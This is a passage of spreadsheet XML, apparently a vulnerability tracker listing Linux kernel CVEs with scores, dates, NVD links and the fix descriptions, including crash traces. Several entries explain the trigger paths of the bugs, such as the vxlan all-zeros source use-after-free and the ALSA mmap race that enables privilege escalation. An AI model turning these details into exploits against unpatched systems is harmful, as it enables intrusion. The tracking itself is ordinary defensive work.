   lsm_blob_alloc+0x2d/0x50
   security_msg_msg_alloc+0x26/0x90
   load_msg+0x1aa/0x210
   do_msgsnd+0x91/0x800
   do_syscall_64+0x109/0x5d0
   entry_SYSCALL_64_after_hwframe+0x77/0x7f
  ...
  Kernel panic - not syncing: Fatal exception
This is a classic ABA problem where cmpxchg succeeds but the state has
changed since __refill_objects_node() took the freelist from the slab.
As Vlastimil Babka mentioned [2], it should be rare to return more than
one slab (due to the racy read of slab-&gt;counters in
get_partial_node_bulk()). Therefore, instead of introducing additional
complexity, acquire and release n-&gt;list_lock twice in the worst case.
Return the slab directly to the partial list and hold n-&gt;list_lock
across the cmpxchg and add_partial(). This is similar to the initial
version of commit ba7425312607 [3]. This is enough to avoid the race as
the list manipulation is serialized by n-&gt;list_lock. While at it,
bring back unlikely() hint now that the condition is unlikely.</t>
        </is>
      </c>
      <c r="T109" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97941</t>
        </is>
      </c>
    </row>
    <row r="110">
      <c r="A110" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B110" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C110" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97971</t>
        </is>
      </c>
      <c r="D110" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E110" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F110" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G110" s="5" t="inlineStr"/>
      <c r="H110" s="5" t="inlineStr"/>
      <c r="I110" s="5" t="inlineStr"/>
      <c r="J110" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K110" s="5" t="inlineStr"/>
      <c r="L110" s="5" t="inlineStr"/>
      <c r="M110" s="5" t="inlineStr"/>
      <c r="N110" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O110" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P110" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q110" s="5" t="inlineStr"/>
      <c r="R110" s="5" t="inlineStr"/>
      <c r="S110" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
nstree: check listing permission before taking a namespace reference
legitimize_ns() takes a reference on the candidate namespace before
may_list_ns() has decided whether the caller may see it. The
__free(ns_put) cleanup on the denied path can drop the last reference to a
mount namespace while we still hold the rcu read lock, and put_mnt_ns()
may sleep there. This is the same problem commit 2ec2aff3c8e2 ("ns: make
sure reference are dropped outside of rcu lock") fixed for the put_user()
path. Neither ns_requested() nor may_list_ns() needs a reference, both
only look at the namespace type and at the caller's own namespaces, so do
the checks first and take the reference last.
Splat:
  Voluntary context switch within RCU read-side critical section!
  WARNING: kernel/rcu/tree_plugin.h:332 at rcu_note_context_switch+0x238/0x2a0, CPU#5: a/3442
  CPU: 5 UID: 1000 PID: 3442 Comm: a Not tainted 7.0.0-30-generic #30-Ubuntu PREEMPT(lazy)
  RIP: 0010:rcu_note_context_switch+0x238/0x2a0
  Call Trace:
   &lt;TASK&gt;
   __schedule+0xcf/0x650
   schedule+0x27/0x90
   schedule_preempt_disabled+0x15/0x30
   __mutex_lock.constprop.0+0x550/0xaf0
   __mutex_lock_slowpath+0x13/0x20
   mutex_lock+0x3b/0x50
   exp_funnel_lock+0xb2/0x260
   synchronize_rcu_expedited+0xe7/0x220
   namespace_unlock+0x26a/0x320
   put_mnt_ns+0xd3/0x120
   mntns_put+0xe/0x20
   do_listns+0x13e/0x560
   __do_sys_listns+0x126/0x2d0
   __x64_sys_listns+0x20/0x30
   x64_sys_call+0x2366/0x2390
   do_syscall_64+0x105/0x5a0
   entry_SYSCALL_64_after_hwframe+0x76/0x7e
   &lt;/TASK&gt;</t>
        </is>
      </c>
      <c r="T110" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97971</t>
        </is>
      </c>
    </row>
    <row r="111">
      <c r="A111" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B111" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C111" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97991</t>
        </is>
      </c>
      <c r="D111" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E111" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F111" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G111" s="5" t="inlineStr"/>
      <c r="H111" s="5" t="inlineStr"/>
      <c r="I111" s="5" t="inlineStr"/>
      <c r="J111" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K111" s="5" t="inlineStr"/>
      <c r="L111" s="5" t="inlineStr"/>
      <c r="M111" s="5" t="inlineStr"/>
      <c r="N111" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O111" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P111" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q111" s="5" t="inlineStr"/>
      <c r="R111" s="5" t="inlineStr"/>
      <c r="S111" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
vdpa_sim_blk: reject out-of-range sector starts
vdpasim_blk_check_range() logs an invalid start sector but continues
validating the request.  The subsequent unsigned capacity subtraction can
underflow and let an out-of-range buffer offset reach the data path.
The invalid offset is used by three request paths.  VIRTIO_BLK_T_OUT
copies guest data to blk-&gt;buffer + offset through
vringh_iov_pull_iotlb(), causing an out-of-bounds write in
_copy_from_iter() or memcpy().  VIRTIO_BLK_T_IN copies from
blk-&gt;buffer + offset to the guest through vringh_iov_push_iotlb(),
causing an out-of-bounds read in _copy_to_iter().
VIRTIO_BLK_T_WRITE_ZEROES passes blk-&gt;buffer + offset to memset(),
causing an out-of-bounds write.
Reject starts at or beyond the capacity before the subtraction.  Treat the
capacity boundary as invalid because the IN and OUT paths round byte counts
down to sectors for validation but later copy the original byte counts.  A
sub-sector request at the capacity boundary would otherwise still access
past the end of the buffer.
I found this bug myself, though the patch was written with AI assistance.</t>
        </is>
      </c>
      <c r="T111" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97991</t>
        </is>
      </c>
    </row>
    <row r="112">
      <c r="A112" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B112" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C112" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98002</t>
        </is>
      </c>
      <c r="D112" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E112" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F112" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G112" s="5" t="inlineStr"/>
      <c r="H112" s="5" t="inlineStr"/>
      <c r="I112" s="5" t="inlineStr"/>
      <c r="J112" s="5" t="inlineStr"/>
      <c r="K112" s="5" t="inlineStr"/>
      <c r="L112" s="5" t="inlineStr"/>
      <c r="M112" s="5" t="inlineStr"/>
      <c r="N112" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O112" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P112" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q112" s="5" t="inlineStr"/>
      <c r="R112" s="5" t="inlineStr"/>
      <c r="S112" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
iommu/amd: Fix ineffective error check in nested domain allocation
amd_iommu_pdom_id_alloc() returns an int: a domain ID on success, or the
negative errno from ida_alloc_range() when the ID space is exhausted or
memory is short.  amd_iommu_alloc_domain_nested() stores that return value
in gdom_info-&gt;hdom_id, which is a u32, and only then tests it:
	gdom_info-&gt;hdom_id = amd_iommu_pdom_id_alloc();
	if (gdom_info-&gt;hdom_id &lt;= 0) {
The assignment discards the sign, so -ENOSPC becomes 0xffffffe4 and the
test never fires.  The nested domain is then set up with a host domain ID
that was never allocated, instead of the allocation failing with -ENOSPC.
Keep the value in an int, test it there, and store it only once it is
known to be valid, which is what the other amd_iommu_pdom_id_alloc()
callers already do.</t>
        </is>
      </c>
      <c r="T112" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98002</t>
        </is>
      </c>
    </row>
    <row r="113">
      <c r="A113" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B113" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C113" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98017</t>
        </is>
      </c>
      <c r="D113" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E113" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F113" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G113" s="5" t="inlineStr"/>
      <c r="H113" s="5" t="inlineStr"/>
      <c r="I113" s="5" t="inlineStr"/>
      <c r="J113" s="5" t="inlineStr"/>
      <c r="K113" s="5" t="inlineStr"/>
      <c r="L113" s="5" t="inlineStr"/>
      <c r="M113" s="5" t="inlineStr"/>
      <c r="N113" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O113" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P113" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q113" s="5" t="inlineStr"/>
      <c r="R113" s="5" t="inlineStr"/>
      <c r="S113" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
net/sched: defer qdisc freeing after failed creation
An RTM_NEWQDISC request can make clsact bind a populated shared ingress
block during -&gt;init(), publishing an embedded mini_Qdisc to lockless
readers.  If the same request has an invalid TCA_RATE, estimator setup
fails after -&gt;init(); the unwind removes the pointer but synchronously
frees its containing qdisc while tc_run() may still hold it.
Retire failed qdiscs through the same RCU helper as normal destruction.
Inline the synchronous free into the callback now that no direct callers
remain.</t>
        </is>
      </c>
      <c r="T113" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98017</t>
        </is>
      </c>
    </row>
    <row r="114">
      <c r="A114" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B114" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C114" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98023</t>
        </is>
      </c>
      <c r="D114" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E114" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F114" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G114" s="5" t="inlineStr"/>
      <c r="H114" s="5" t="inlineStr"/>
      <c r="I114" s="5" t="inlineStr"/>
      <c r="J114" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K114" s="5" t="inlineStr"/>
      <c r="L114" s="5" t="inlineStr"/>
      <c r="M114" s="5" t="inlineStr"/>
      <c r="N114" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O114" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P114" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q114" s="5" t="inlineStr"/>
      <c r="R114" s="5" t="inlineStr"/>
      <c r="S114" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
vxlan: reject dynamic fdb entries that reference a nexthop id
The commit cited in the Fixes tag allowed VXLAN FDB entries to point to
FDB nexthops so that overlay traffic could be load balanced across
multiple VTEPs. Such entries can only be configured from user space,
cannot be learned and cannot roam. They only make sense with a user space
control plane such as E-VPN where data plane learning is disabled.
Despite that, the VXLAN driver does not currently prevent such entries
from being configured with the "dynamic" flag. The per-nexthop FDB list
is only protected by the per-device hash lock, which is not sufficient
when two VXLAN devices point to the same FDB nexthop and therefore share
the list. Aging runs in softirq context without RTNL, so an entry deleted
by one device can race with an addition or deletion from the other,
leading to list corruption:
  list_del corruption. next-&gt;prev should be ffff8881069d9548, but was
  dead000000000122. (next=ffff8881069d9448)
  WARNING: CPU: 0 PID: 90 at lib/list_debug.c:65
  __list_del_entry_valid_or_report+0x1aa/0x210
  ...
   vxlan_fdb_destroy+0x5b8/0xad0
   vxlan_cleanup+0x328/0x450
   call_timer_fn+0x2a/0x1c0
   run_timer_softirq+0x18c/0x210
  BUG: KASAN: slab-use-after-free in vxlan_fdb_destroy
Fix this by rejecting the bogus configuration of dynamic FDB entries that
point to FDB nexthops, both when created and when an existing entry is
updated. As such, the per-nexthop FDB list is only ever mutated under the
RTNL lock. Add test cases to make sure that this does not regress in the
future.</t>
        </is>
      </c>
      <c r="T114" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98023</t>
        </is>
      </c>
    </row>
    <row r="115">
      <c r="A115" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B115" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C115" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98052</t>
        </is>
      </c>
      <c r="D115" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E115" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F115" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G115" s="5" t="inlineStr"/>
      <c r="H115" s="5" t="inlineStr"/>
      <c r="I115" s="5" t="inlineStr"/>
      <c r="J115" s="5" t="inlineStr"/>
      <c r="K115" s="5" t="inlineStr"/>
      <c r="L115" s="5" t="inlineStr"/>
      <c r="M115" s="5" t="inlineStr"/>
      <c r="N115" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O115" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P115" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q115" s="5" t="inlineStr"/>
      <c r="R115" s="5" t="inlineStr"/>
      <c r="S115" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
net: bcmasp: clear txcb-&gt;last before writing each descriptor
bcmasp_xmit() only wrote txcb-&gt;last = true for the final fragment
of an SKB; non-final fragments left the field untouched.  If a
descriptor slot was reused while it still held a stale true from
a previous SKB (possible when tx_spb_ring_full() underreported
fullness), bcmasp_tx_reclaim() would see last == true mid-SKB and
call dev_consume_skb_any() prematurely, freeing the sk_buff while
its remaining fragments were still in flight.
Unconditionally clear txcb-&gt;last before the conditional set so every
descriptor slot starts from a known false state regardless of what a
prior transmission left behind.</t>
        </is>
      </c>
      <c r="T115" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98052</t>
        </is>
      </c>
    </row>
    <row r="116">
      <c r="A116" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B116" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C116" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98073</t>
        </is>
      </c>
      <c r="D116" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E116" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F116" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G116" s="5" t="inlineStr"/>
      <c r="H116" s="5" t="inlineStr"/>
      <c r="I116" s="5" t="inlineStr"/>
      <c r="J116" s="5" t="inlineStr">
        <is>
          <t>f5, go, gin</t>
        </is>
      </c>
      <c r="K116" s="5" t="inlineStr"/>
      <c r="L116" s="5" t="inlineStr"/>
      <c r="M116" s="5" t="inlineStr"/>
      <c r="N116" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O116" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P116" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q116" s="5" t="inlineStr"/>
      <c r="R116" s="5" t="inlineStr"/>
      <c r="S116" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
net: Remove conflicting altnames for dying netns in __dev_change_net_namespace().
syzbot reported the warning in cfg80211_pernet_exit(). [0]
The repro does the following:
  1. create two device in root netns and non-root netns
  2. assign the same altname for the two devices
  3. remove the non-root netns
Since commit 7663d522099e ("net: check for altname conflicts
when changing netdev's netns"), cfg80211_switch_netns() and
cfg802154_switch_netns() fail if init_net has a device with the
conflicting altname.
default_device_exit_net() had the same issue and commit d09486a04f5d
("net: fix removing a namespace with conflicting altnames") fixed it.
cfg80211_pernet_exit() and cfg802154_pernet_exit() need the same fix.
Let's generalise the fix by removing conflicting altnames for dying
netns in __dev_change_net_namespace().
[0]:
cfg80211_switch_netns(rdev, &amp;init_net)
WARNING: net/wireless/core.c:1871 at cfg80211_pernet_exit+0xd5/0x120 net/wireless/core.c:1871, CPU#1: kworker/u8:9/1160
Modules linked in:
CPU: 1 UID: 0 PID: 1160 Comm: kworker/u8:9 Not tainted syzkaller #0 PREEMPT(full)
Hardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 07/24/2026
Workqueue: netns cleanup_net
RIP: 0010:cfg80211_pernet_exit+0xd5/0x120 net/wireless/core.c:1871
Code: e8 03 42 80 3c 20 00 74 08 4c 89 f7 e8 b4 ef 0e f7 4d 8b 36 49 81 fe 20 10 4a 90 74 12 e8 03 3d 9f f6 eb 85 e8 fc 3c 9f f6 90 &lt;0f&gt; 0b 90 eb cc e8 f1 3c 9f f6 eb 05 e8 ea 3c 9f f6 5b 41 5c 41 5e
RSP: 0018:ffffc900057a78f0 EFLAGS: 00010293
RAX: ffffffff8b287154 RBX: ffff88807ba72780 RCX: ffff8880213e8000
RDX: 0000000000000000 RSI: 00000000ffffffef RDI: 0000000000000000
RBP: 00000000ffffffef R08: ffffffff9024cc67 R09: 0000000000000000
R10: fffff52000af4eb0 R11: fffffbfff204998d R12: dffffc0000000000
R13: ffffffff904a1080 R14: ffff888144ed0008 R15: ffff888144ed0e20
FS:  0000000000000000(0000) GS:ffff888124de6000(0000) knlGS:0000000000000000
CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
CR2: 00005642de0a8a70 CR3: 000000007a40c000 CR4: 00000000003526f0
Call Trace:
 &lt;TASK&gt;
 ops_exit_list net/core/net_namespace.c:200 [inline]
 ops_undo_list+0x43d/0x8d0 net/core/net_namespace.c:253
 cleanup_net+0x572/0x810 net/core/net_namespace.c:706
 process_one_work kernel/workqueue.c:3387 [inline]
 process_scheduled_works+0xc3d/0x1630 kernel/workqueue.c:3470
 worker_thread+0xa47/0xfb0 kernel/workqueue.c:3551
 kthread+0x38b/0x480 kernel/kthread.c:436
 ret_from_fork+0x514/0xb70 arch/x86/kernel/process.c:158
 ret_from_fork_asm+0x1a/0x30 arch/x86/entry/entry_64.S:245
 &lt;/TASK&gt;</t>
        </is>
      </c>
      <c r="T116" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98073</t>
        </is>
      </c>
    </row>
    <row r="117">
      <c r="A117" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B117" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C117" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98112</t>
        </is>
      </c>
      <c r="D117" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E117" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F117" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G117" s="5" t="inlineStr"/>
      <c r="H117" s="5" t="inlineStr"/>
      <c r="I117" s="5" t="inlineStr"/>
      <c r="J117" s="5" t="inlineStr"/>
      <c r="K117" s="5" t="inlineStr"/>
      <c r="L117" s="5" t="inlineStr"/>
      <c r="M117" s="5" t="inlineStr"/>
      <c r="N117" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O117" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P117" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q117" s="5" t="inlineStr"/>
      <c r="R117" s="5" t="inlineStr"/>
      <c r="S117" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ksmbd: fix listener task lifetime on netdev events
The listener thread exits when its listening socket is shutdown. The
netdevice notifier shuts down the socket before calling kthread_stop(), so
the task_struct can be freed before kthread_stop() gets its reference.
Create the listener in a stopped state and hold an extra task_struct
reference until kthread_stop_put() completes. Also stop and release
listeners before freeing their interface records during TCP teardown.</t>
        </is>
      </c>
      <c r="T117" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98112</t>
        </is>
      </c>
    </row>
    <row r="118">
      <c r="A118" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B118" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C118" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98116</t>
        </is>
      </c>
      <c r="D118" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E118" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F118" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G118" s="5" t="inlineStr"/>
      <c r="H118" s="5" t="inlineStr"/>
      <c r="I118" s="5" t="inlineStr"/>
      <c r="J118" s="5" t="inlineStr"/>
      <c r="K118" s="5" t="inlineStr"/>
      <c r="L118" s="5" t="inlineStr"/>
      <c r="M118" s="5" t="inlineStr"/>
      <c r="N118" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O118" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P118" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q118" s="5" t="inlineStr"/>
      <c r="R118" s="5" t="inlineStr"/>
      <c r="S118" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ALSA: pcm: Serialize PCM mmap with buffer reallocation to fix page UAF
snd_pcm_hw_params() and snd_pcm_hw_free() guard buffer reallocation
with an mmap_count check performed under the PCM stream lock, but the
lock is released long before the buffer is actually freed:
snd_pcm_sync_stop(), constraint refinement and do_free_pages() all
happen in between.  snd_pcm_mmap_data(), on the other hand, takes no
lock at all: it validates against the old buffer's state and
dma_bytes, remaps its pages into the VMA, and only then increments
mmap_count.
A concurrent mmap() can therefore slip in between the check and the
free.  remap_pfn_range() installs writable PTEs for the old buffer's
pages without taking page references, and the subsequent
do_free_pages() returns those pages to the page allocator while the
VMA still maps them.  This leaves a stale, writable mapping of freed
pages: a page-level use-after-free that can be leveraged for local
privilege escalation.
Make snd_pcm_mmap_data() participate in the buffer-access scheme
introduced for hw_params/hw_free: acquire runtime-&gt;buffer_accessing
before validating and remapping, and release it afterwards.  Buffer
reallocation already fails with -EBUSY while accessors are active,
and the mmap side now fails with -EBUSY while a reallocation is in
progress, so the validate/remap sequence and the check/free sequence
can no longer interleave.
A reproducer that turns this race into a stale writable mapping of
the freed DMA buffer pages is available on request.</t>
        </is>
      </c>
      <c r="T118" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98116</t>
        </is>
      </c>
    </row>
    <row r="119">
      <c r="A119" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B119" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C119" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98122</t>
        </is>
      </c>
      <c r="D119" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E119" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F119" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G119" s="5" t="inlineStr"/>
      <c r="H119" s="5" t="inlineStr"/>
      <c r="I119" s="5" t="inlineStr"/>
      <c r="J119" s="5" t="inlineStr">
        <is>
          <t>express</t>
        </is>
      </c>
      <c r="K119" s="5" t="inlineStr"/>
      <c r="L119" s="5" t="inlineStr"/>
      <c r="M119" s="5" t="inlineStr"/>
      <c r="N119" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O119" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P119" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q119" s="5" t="inlineStr"/>
      <c r="R119" s="5" t="inlineStr"/>
      <c r="S119" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
vxlan: mdb: Fix use-after-free in vxlan_mdb_remote_src_del()
vxlan_mdb_is_valid_source(), which validates MDBE_ATTR_SOURCE and every
MDBE_ATTR_SRC_LIST member, accepts the all-zeros address.
A source list is only accepted on a (*, G) entry, whose source is the
all-zeros address, and for each member of the list an (S, G) entry is
derived from it by substituting the source. Entries are keyed by a plain
memcmp() of struct vxlan_mdb_entry_key, so if MDBE_ATTR_SOURCE is present
and holds the all-zeros address and the source list holds it as well, the
derived (S, G) key is byte-identical to the (*, G) key and resolves to the
same entry. Omitting MDBE_ATTR_SOURCE is not equivalent, as the key is
then left with a zero address family.
vxlan_mdb_remote_src_del() removes the forwarding entry of a source before
freeing the source entry:
	vxlan_mdb_remote_src_fwd_del(vxlan, group, remote, &amp;ent-&gt;addr);
	vxlan_mdb_remote_src_entry_del(ent);
With the keys aliased, the first call deletes the remote of the entry that
owns 'ent' instead of a separate (S, G) entry, and frees 'ent'. The second
call then runs on the freed entry, and its hlist_del() reads -&gt;pprev and
-&gt;next out of it and writes through them.
Adding the (*, G) entry with NLM_F_REPLACE and no source list marks the
all-zeros source for deletion and reaches this from the sweep at the end
of vxlan_mdb_remote_srcs_replace().
  BUG: KASAN: slab-use-after-free in __vxlan_mdb_add+0x1cd/0xd70
  Read of size 8 at addr ffff888102852500 by task poc/84
   __vxlan_mdb_add+0x1cd/0xd70
   vxlan_mdb_add+0xc0/0x140
   rtnl_mdb_add+0x157/0x2a0
   rtnetlink_rcv_msg+0x207/0x5a0
  Allocated by task 84:
   __kmalloc_cache_noprof+0x153/0x360
   vxlan_mdb_remote_srcs_add+0x2eb/0x440
   __vxlan_mdb_add+0x803/0xd70
  Freed by task 84:
   kfree+0x14c/0x3b0
   vxlan_mdb_remote_del+0x129/0x1a0
   __vxlan_mdb_del+0x4f/0xe0
   vxlan_mdb_remote_src_fwd_del.isra.0+0x162/0x1b0
   __vxlan_mdb_add+0x1c5/0xd70
The MDB operations are netns-scoped, so an unprivileged user can perform
them in a new user and network namespace.
Reject the all-zeros address in vxlan_mdb_is_valid_source(), which covers
both call sites. A (*, G) entry is expressed by omitting the source, so
nothing legitimate is refused.
Discovered by XBOW, triaged by Baul Lee &lt;baul.lee@xbow.com&gt;</t>
        </is>
      </c>
      <c r="T119" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98122</t>
        </is>
      </c>
    </row>
    <row r="120">
      <c r="A120" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B120" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C120" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98143</t>
        </is>
      </c>
      <c r="D120" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E120" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F120" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G120" s="5" t="inlineStr"/>
      <c r="H120" s="5" t="inlineStr"/>
